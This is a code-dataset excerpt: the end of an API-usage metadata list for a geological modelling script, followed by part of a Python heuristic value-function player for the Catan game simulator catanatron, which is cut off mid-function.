"github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.mixture", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 183, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 259, "usage_type": "call"}, {"api_name": "gempy.create_data", "line_number": 273, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 290, "usage_type": "call"}, {"api_name": "gempy.set_orientation_from_interfaces", "line_number": 298, "usage_type": "call"}, {"api_name": "gempy.set_series", "line_number": 302, "usage_type": "call"}, {"api_name": "gempy.InterpolatorData", "line_number": 308, "usage_type": "call"}, {"api_name": "gempy.compute_model", "line_number": 313, "usage_type": "call"}, {"api_name": "gempy.plotting.plot_section", "line_number": 318, "usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 318, "usage_type": "attribute"}, {"api_name": "gempy.plotting.plot_section", "line_number": 321, "usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 321, "usage_type": "attribute"}, {"api_name": "gempy.get_surfaces", "line_number": 324, "usage_type": "call"}, {"api_name": "gempy.plotting.plot_surfaces_3D_real_time", "line_number": 325, 
"usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 325, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 440, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.asarray", 
"line_number": 482, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 502, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 555, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 614, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 615, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 640, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 647, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 673, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 710, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 748, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 754, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 760, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 760, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 761, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 762, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 763, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 764, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 791, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 808, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 826, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 829, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 833, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 834, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 835, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 851, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 856, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 857, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 857, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 858, "usage_type": "call"}, {"api_name": 
"numpy.linalg.det", "line_number": 859, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 859, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 879, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 881, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 882, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 887, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 890, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 890, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 892, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 903, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 903, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 906, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 906, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 918, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 920, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 925, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 928, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 931, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 933, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 936, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 938, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 944, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 950, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 958, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 961, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 966, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 968, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 972, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 975, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 978, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 981, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 985, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 987, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 991, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 994, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 997, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1000, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1005, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1006, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1011, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1012, 
"usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1014, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1017, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1020, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1029, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 1044, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1057, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1057, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1070, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1070, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1086, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1097, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1097, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1125, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1126, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 1126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1128, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1129, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 1129, "usage_type": "name"}, {"api_name": "matplotlib.rcParams.update", "line_number": 1131, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 1131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1134, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1159, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1159, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1166, "usage_type": "name"}, {"api_name": "numpy.tile", "line_number": 1167, "usage_type": "call"}, 
{"api_name": "numpy.expand_dims", "line_number": 1167, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1168, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1191, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1196, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1197, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1197, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1202, "usage_type": "name"}, {"api_name": "ie.reshape", "line_number": 1205, "usage_type": "call"}, {"api_name": "ie.reshape", "line_number": 1207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 1210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1212, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 1215, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1232, "usage_type": "call"}, {"api_name": "heapq.nsmallest", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1252, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1255, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1256, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1261, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1268, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1268, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1275, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 1276, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 1291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1291, "usage_type": "attribute"}, {"api_name": "numpy.cumsum", "line_number": 1293, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 1297, "usage_type": "call"}, {"api_name": "numpy.greater_equal", "line_number": 1297, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1301, "usage_type": "call"}, {"api_name": "numpy.longfloat", "line_number": 1301, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 1303, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1303, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 1326, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 1328, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1328, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 1333, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 1338, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1338, "usage_type": "attribute"}, {"api_name": 
"scipy.stats.multivariate_normal", "line_number": 1341, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 1341, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 1348, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1378, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1379, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 1381, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1381, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 1383, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1383, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1394, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1394, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1411, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1412, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1414, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.kron", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1429, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1431, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.kron", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1443, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1468, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1470, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 1470, "usage_type": "call"}, {"api_name": "sklearn.mixture", "line_number": 1470, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1472, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 1481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1489, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
1489, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 1490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1491, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 1500, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1507, "usage_type": "call"}, {"api_name": "gempy.loc", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "gempy.drop", "line_number": 1512, "usage_type": "call"}, {"api_name": "gempy.index", "line_number": 1514, "usage_type": "attribute"}, {"api_name": "gempy.to_csv", "line_number": 1522, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1526, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1526, "usage_type": "call"}]}
+{"seq_id": "5616608408", "text": "import time\nimport random\nfrom typing import Any\n\nfrom catanatron.state_functions import (\n get_longest_road_length,\n get_played_dev_cards,\n get_player_buildings,\n player_key,\n player_num_dev_cards,\n player_num_resource_cards,\n)\nfrom catanatron.game import Game\nfrom catanatron.models.player import Player\nfrom catanatron.models.actions import ActionType\nfrom catanatron.models.enums import RESOURCES, BuildingType\nfrom catanatron_gym.features import (\n build_production_features,\n reachability_features,\n resource_hand_features,\n)\nfrom catanatron_experimental.machine_learning.players.tree_search_utils import (\n expand_spectrum,\n)\n\nTRANSLATE_VARIETY = 4 # i.e. each new resource is like 4 production points\n\nDEFAULT_WEIGHTS = {\n # Where to place. Note winning is best at all costs\n \"public_vps\": 3e14,\n \"production\": 1e8,\n \"enemy_production\": -1e8,\n \"num_tiles\": 1,\n # Towards where to expand and when\n \"reachable_production_0\": 0,\n \"reachable_production_1\": 1e4,\n \"buildable_nodes\": 1e3,\n \"longest_road\": 10,\n # Hand, when to hold and when to use.\n \"hand_synergy\": 1e2,\n \"hand_resources\": 1,\n \"discard_penalty\": -5,\n \"hand_devs\": 10,\n \"army_size\": 10.1,\n}\n\n# Change these to play around with new values\nCONTENDER_WEIGHTS = {\n \"public_vps\": 300000000000001.94,\n \"production\": 100000002.04188395,\n \"enemy_production\": -99999998.03389844,\n \"num_tiles\": 2.91440418,\n \"reachable_production_0\": 2.03820085,\n \"reachable_production_1\": 10002.018773150001,\n \"buildable_nodes\": 1001.86278466,\n \"longest_road\": 12.127388499999999,\n \"hand_synergy\": 102.40606877,\n \"hand_resources\": 2.43644327,\n \"discard_penalty\": -3.00141993,\n \"hand_devs\": 10.721669799999999,\n \"army_size\": 12.93844622,\n}\n\n\nclass ValueFunctionPlayer(Player):\n \"\"\"\n Player that selects the move that maximizes a heuristic value function.\n\n For now, the base value function only considers 1 enemy player.\n \"\"\"\n\n def __init__(\n self, color, value_fn_builder_name=None, params=None, is_bot=True, epsilon=None\n ):\n super().__init__(color, is_bot)\n self.value_fn_builder_name = (\n \"contender_fn\" if value_fn_builder_name == \"C\" else \"base_fn\"\n )\n self.params = params\n self.epsilon = epsilon\n\n def decide(self, game, playable_actions):\n if len(playable_actions) == 1:\n return playable_actions[0]\n\n if self.epsilon is not None and random.random() < self.epsilon:\n return random.choice(playable_actions)\n\n best_value = float(\"-inf\")\n best_action = None\n for action in playable_actions:\n game_copy = game.copy()\n game_copy.execute(action)\n\n value_fn = get_value_fn(self.value_fn_builder_name, self.params)\n value = value_fn(game_copy, self.color)\n if value > best_value:\n best_value = value\n best_action = action\n\n return best_action\n\n def __str__(self): \n return super().__str__() + f\"(value_fn={self.value_fn_builder_name})\"\n\n\ndef get_value_fn(name, params, value_function=None):\n if value_function is not None:\n return value_function\n elif name == \"base_fn\":\n return base_fn(DEFAULT_WEIGHTS)\n elif name == \"contender_fn\":\n return contender_fn(params)\n else:\n raise ValueError\n\n\ndef base_fn(params=DEFAULT_WEIGHTS):\n def fn(game, p0_color):\n production_features = build_production_features(True)\n our_production_sample = production_features(game, p0_color)\n enemy_production_sample = production_features(game, p0_color)\n production = value_production(our_production_sample, 
\"P0\")\n enemy_production = value_production(enemy_production_sample, \"P1\", False)\n\n key = player_key(game.state, p0_color)\n longest_road_length = get_longest_road_length(game.state, p0_color)\n\n reachability_sample = reachability_features(game, p0_color, 2)\n features = [f\"P0_0_ROAD_REACHABLE_{resource}\" for resource in RESOURCES]\n reachable_production_at_zero = sum([reachability_sample[f] for f in features])\n features = [f\"P0_1_ROAD_REACHABLE_{resource}\" for resource in RESOURCES]\n reachable_production_at_one = sum([reachability_sample[f] for f in features])\n\n hand_sample = resource_hand_features(game, p0_color)\n features = [f\"P0_{resource}_IN_HAND\" for resource in RESOURCES]\n distance_to_city = (\n max(2 - hand_sample[\"P0_WHEAT_IN_HAND\"], 0)\n + max(3 - hand_sample[\"P0_ORE_IN_HAND\"], 0)\n ) / 5.0 # 0 means good. 1 means bad.\n distance_to_settlement = (\n max(1 - hand_sample[\"P0_WHEAT_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_SHEEP_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_BRICK_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_WOOD_IN_HAND\"], 0)\n ) / 4.0 # 0 means good. 1 means bad.\n hand_synergy = (2 - distance_to_city - distance_to_settlement) / 2\n\n num_in_hand = player_num_resource_cards(game.state, p0_color)\n discard_penalty = params[\"discard_penalty\"] if num_in_hand > 7 else 0\n\n # blockability\n buildings = game.state.buildings_by_color[p0_color]\n owned_nodes = buildings[BuildingType.SETTLEMENT] + buildings[BuildingType.CITY]\n owned_tiles = set()\n for n in owned_nodes:\n owned_tiles.update(game.state.board.map.adjacent_tiles[n])\n num_tiles = len(owned_tiles)\n\n # TODO: Simplify to linear(?)\n num_buildable_nodes = len(game.state.board.buildable_node_ids(p0_color))\n longest_road_factor = (\n params[\"longest_road\"] if num_buildable_nodes == 0 else 0.1\n )\n\n return float(\n game.state.player_state[f\"{key}_VICTORY_POINTS\"] * params[\"public_vps\"]\n + production * params[\"production\"]\n + enemy_production * params[\"enemy_production\"]\n + reachable_production_at_zero * params[\"reachable_production_0\"]\n + reachable_production_at_one * params[\"reachable_production_1\"]\n + hand_synergy * params[\"hand_synergy\"]\n + num_buildable_nodes * params[\"buildable_nodes\"]\n + num_tiles * params[\"num_tiles\"]\n + num_in_hand * params[\"hand_resources\"]\n + discard_penalty\n + longest_road_length * longest_road_factor\n + player_num_dev_cards(game.state, p0_color) * params[\"hand_devs\"]\n + get_played_dev_cards(game.state, p0_color, \"KNIGHT\") * 